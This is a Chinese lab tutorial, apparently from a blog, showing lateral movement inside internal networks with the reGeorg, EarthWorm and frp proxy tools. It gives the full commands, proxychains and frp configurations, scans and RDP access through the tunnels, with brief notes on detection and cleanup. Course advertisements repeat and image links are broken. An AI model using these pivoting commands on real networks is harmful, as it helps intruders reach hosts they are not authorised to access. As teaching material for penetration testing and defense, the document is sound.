既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上Go语言开发知识点,真正体系化!
由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新
netstat -antlp
通过如下命令可以确定进程的可执行文件所在位置,并进行清除。
ls -al /proc/pid
在靶机B上运行如下命令可以看到靶机A与自身的远程桌面3389端口建立了tcp连接。
netstat -ano
2.3 regeorg正向代理
regeorg工具通过http协议建立通信隧道,攻击者通常在获得内网某台web服务器权限后,上传该工具创建socket监听一个端口用于正向代理,攻击者通过此端口可将攻击流量透传至目标内网其他服务器,从而达到内网横向渗透扩大战果的目的。
注意点:
实际环境下攻击者利用靶机的漏洞上传该工具,本示例目的为演示代理工具的使用和原理,未体现漏洞利用过程。
场景:
在靶机A上上传regeorg后门文件,在攻击机上运行regeorg脚本连接后门,使得本地攻击流量可通过此http隧道转发至内网环境。
示例 利用regeorg工具正向代理进行内网横向渗透
攻击机:10.211.55.5(kali)
靶机A:10.211.55.7(centos7+tomcat)
靶机B:10.211.55.15(windows server2003)
工具下载:
在攻击机上执行如下命令下载regeorg代理工具包
git clone https://github.com/sensepost/reGeorg.git
在靶机A上上传regeorg代理工具包如下:(实际攻击场景下通过利用靶机A的漏洞上传此工具包)
在攻击机上运行代理脚本,由于靶机A使用的是jsp类型网站脚本,命令如下:
python reGeorgSocksProxy.py -u http://10.211.55.7:8080/reGeorg-master/tunnel.jsp -p 1088
提示georg says, ‘all seems fine’说明连接成功,已完成端口复用。
在攻击机上配置本地全局代理proxychains,使得本地攻击流量可通过regeorg创建的http隧道转发至内网其他服务器。
攻击机自带proxychains全局代理工具,默认路径为/etc/proxychains4.conf,编辑配置文件在文件最后增加如下配置:
Socks5 127.0.0.1 1088
以上配置使得攻击机可将支持socks5协议的攻击流量通过本地1088端口转发至靶机A,再通过靶机A转发至内网其他服务器。
查看攻击机上的regeorg的运行日志可以看到,telnet请求的目的地址和端口。
查看靶机A上的网络连接,可以看到攻击机的请求成功实现端口复用,复用了java进程创建的端口连接了靶机B的445端口。
查看靶机B的网络连接无法看到攻击机ip地址,靶机A作为攻击机的正向代理
下面使用端口扫描工具对靶机B进行端口扫描,命令如下:
proxychains4 namp -sT 10.211.55.15 -Pn
成功扫描出靶机B开放的端口。
在靶机B上抓包可以看到所有的端口扫描请求源地址均来自靶机A而不是攻击机。
regeorg代理工具是基于web程序实现的,其可执行文件一般位于网站路径下,可通过上传web后门查杀工具进行本地查杀。
上传web后门查杀工具后执行如下命令指定查杀路径,可以发现网站路径下攻击者不仅上传了regeorg代理工具同时也被植入了web后门文件。
根据其扫描结果与网站开发核实后进行清除,同时可检查同路径下有无创建时间相同的脚本文件并与开发核实防止web后门查杀工具存在漏报误报情况。
./hm scan /usr/local/tomcat/tomcat/apache-tomcat-8.5.51/webapps/
3 反向代理
3.1 earthworm反向代理
earthworm是一套便携式网络穿透工具,具有socks和端口转发两大核心功能,支持正向代理、反向代理、多级代理等方式打通网络隧道,可在复杂网络环境下完成网络穿透和内网横向渗透的功能。
注意点:
实际环境下攻击者利用靶机的漏洞上传该工具,本示例目的为演示代理工具的使用和原理,未体现漏洞利用过程。
场景:
分别在靶机A、B以及攻击机上运行earthworm代理工具,使得攻击机将靶机A、B作为其多级代理进行内网横向渗透。
示例1 利用earthworm反向代理进行内网横向渗透
靶机A:10.211.55.7(centos7)
靶机B:10.211.55.15(windows server 2003r2)
攻击机:10.211.55.4(kali)
工具下载路径如下:
git clone https://github.com/idlefire/ew.git
使用上述命令在攻击机上下载该工具如下:
下载成功后运行如下命令,可在攻击机本地开启1080和8888监听端口,并将1080端口收到的流量转发至8888端口。
./ew_for_linux64 -s rcsocks -l 1080 -e 8888
使用命令netstat -antlp 可以看到攻击机本地开启了1080和8888监听端口。
在靶机A上上传earthworm,并运行如下命令连接攻击机的8888端口,建立与攻击机的反向代理。
./ew -s rssocks -d vpsip -e 8888
运行后可以看到程序日志提示已完成代理的连接。
在攻击机上修改全局代理软件proxychains的配置文件,默认路径
为/etc/proxychains4.conf,配置socks5代理地址和端口如下:
注意:
由于演练环境为本地搭建,实际环境下攻击机地址一般为公网vps地址,若设置为公网vps地址,此时全局代理配置ip应设置为vps地址。
在攻击机上使用如下命令通过代理隧道探测靶机B的3389端口是否开启,telnet使用的是tcp协议,而socks5协议支持tcp和udp协议数据的传递。
proxychains telnet 10.211.55.15 3389
在靶机A的earthworm日志上可以看到攻击机发起的telnet请求触发的tcp数据包成功转发至靶机B上。
在靶机A上查看网络连接可以看到靶机A与攻击机的8888端口建立了tcp连接,同时也可看到靶机A成功代理了攻击机触发的3389请求。
在靶机B上只能看到靶机A的地址与自身3389端口建立了连接,无法看到攻击机地址。
此时利用全局代理以及靶机A的代理隧道,即使靶机B处于内网无法通过外网访问,也可通过此代理隧道实现远程登录靶机B,实现内网的横向移动。
使用如下命令远程登录靶机B:
proxychains4 resktop 10.211.55.15
攻击机弹出了靶机B的远程桌面端口,此时若靶机B使用了弱密码或被暴力破解成功即可实现远程登录。
示例2 使用earthworm多级代理进行内网横向渗透
靶机A:10.211.55.7(centos7)
靶机B:10.211.55.15(windows server 2003r2)
靶机C:10.211.55.3(windows10)
攻击机:10.211.55.4(kali)
本示例中靶机A可访问攻击机,靶机B和C均与攻击机网络不通,但与靶机A网络互通。
注意:
某些条件下,内网某些服务器无法访问互联网,需通过级联的方式将可访问互联网的主机作为一级代理连接攻击机,二级代理连接一级代理主机即可形成通信隧道,攻击机可通过级联的方式将攻击流量转发至更深入的内网。
在攻击机上运行如下命令,可在攻击机本地开启1080和8888监听端口,并将1080端口收到的流量转发至8888端口。
./ew -s lcx_listen -l 1080 -e 8888
在靶机B上运行如下命令,可开启9999端口的正向代理。
./ew -s ssocksd -l 9999
在靶机A上运行如下命令,同时连接攻击机的反向代理端口和靶机B的正向代理端口。
./ew -s lcx_slave -d 10.211.55.4 -e 8888 -f 10.211.55.15 -g 9999
当靶机A成功连接上攻击机时,攻击机代理日志可以看到连接成功记录。
在攻击机上使用如下命令通过代理隧道探测靶机C的3389端口是否开启,
telnet使用的是tcp协议,而socks5协议支持tcp和udp协议数据的传递。
proxychains telnet 10.211.55.3 3389
此时登录靶机C查看网络连接可以看到telnet请求触发的tcp连接发起端为靶机B。
说明攻击机发起的请求经由靶机A转发至靶机B,有经由靶机B的正向代理转发至靶机C。
使用如下命令远程登录靶机C:
proxychains4 resktop 10.211.55.3
攻击机弹出了靶机B的远程桌面端口,此时若靶机B使用了弱密码或被暴力破解成功即可实现远程登录。
3.2 frp反向代理
frp 是一个可用于内网穿透的高性能的反向代理应用,支持tcp、udp协议。
运维人员使用 frp 进行反向代理,满足通过公网服务器访问处于内网的服务,如访问内网web服务,远程ssh内网服务器,远程控制内网nas等,但此类操作存在较大安全隐患,会将内网服务直接暴露在公网。
对于内网渗透来讲,这种功能恰好能够满足我们进行内网渗透的流量转发。frp最大的一个特点是使用socks代理,而socks是加密通信的,类似于做了一个加密的隧道,可以把外网的流量,通过加密隧道穿透到内网。
注意点:
实际环境下攻击者利用靶机的漏洞上传该工具,本示例目的为演示代理工具的使用和原理,未体现漏洞利用过程。
场景:
分别在靶机A和攻击机上运行frp代理工具,使得攻击机将靶机A作为其代理进行内网横向渗透。
示例 利用frp反向代理进行内网横向渗透
靶机A:10.211.55.7(centos7)
靶机B:10.211.55.3(windows)
攻击机:10.211.55.4(kali)
工具下载路径如下:
https://github.com/fatedier/frp/releases
根据运行系统选择合适版本下载,本示例运行平台均为linux,选择frp_0.35.1_linux_amd64.tar.gz进行下载。
在攻击机上编辑frp服务端配置文件frps.ini,配置内容如下:
[common]
bind_port = 33310
allow_ports=33310-33410
token = ZUcviGVBciVNip4YoeE0
在攻击机上进入到frp目录,运行如下命令启动代理程序服务端。
./frps -c frps.ini #nohup ./frps -c frps.ini&后台运行
在靶机A上上传frp工具包后,编辑frp客户端配置文件frpc.ini,配置内容如下:
[common]``server_addr = 10.211.55.4``server_port = 33310``token = ZUcviGVBciVNip4YoeE0``[socks_proxy]``type= tcp``plugin= socks5``remote_port = 33311``local_port = 33311
进入靶机A的frp目录下,运行如下命令即可启动反向代理客户端。
在攻击机上修改全局代理软件proxychains的配置文件,默认路径
为/etc/proxychains4.conf,配置socks5代理地址和端口如下:
socks5 127.0.0.1 33311
注意:
由于演练环境为本地搭建,实际环境下攻击机地址一般为公网vps地址,若设置为公网vps地址,此时全局代理配置ip应设置为vps地址。
在攻击机上使用如下命令通过代理隧道探测靶机B的3389端口是否开启,
telnet使用的是tcp协议,而socks5协议支持tcp和udp协议数据的传递。
登录靶机B可以看到攻击机telnet触发的请求经由靶机A的代理隧道转发至靶机B。
使用如下命令远程登录靶机B:
proxychains4 resktop 10.211.55.3
攻击机弹出了靶机B的远程桌面端口,此时若靶机B使用了弱密码或被暴力破解成功即可实现远程登录。
黑客&网络安全如何学习
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上Go语言开发知识点,真正体系化!
由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新
dcecc1afa9e4ead84b9.jpeg)
proxychains4 resktop 10.211.55.3
攻击机弹出了靶机B的远程桌面端口,此时若靶机B使用了弱密码或被暴力破解成功即可实现远程登录。
黑客&网络安全如何学习
[外链图片转存中…(img-EVTP5nWi-1715654614702)]
[外链图片转存中…(img-1cRnEWbQ-1715654614702)]
[外链图片转存中…(img-GJdmKRHB-1715654614702)]
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上Go语言开发知识点,真正体系化!
由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新
扫一扫
667
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
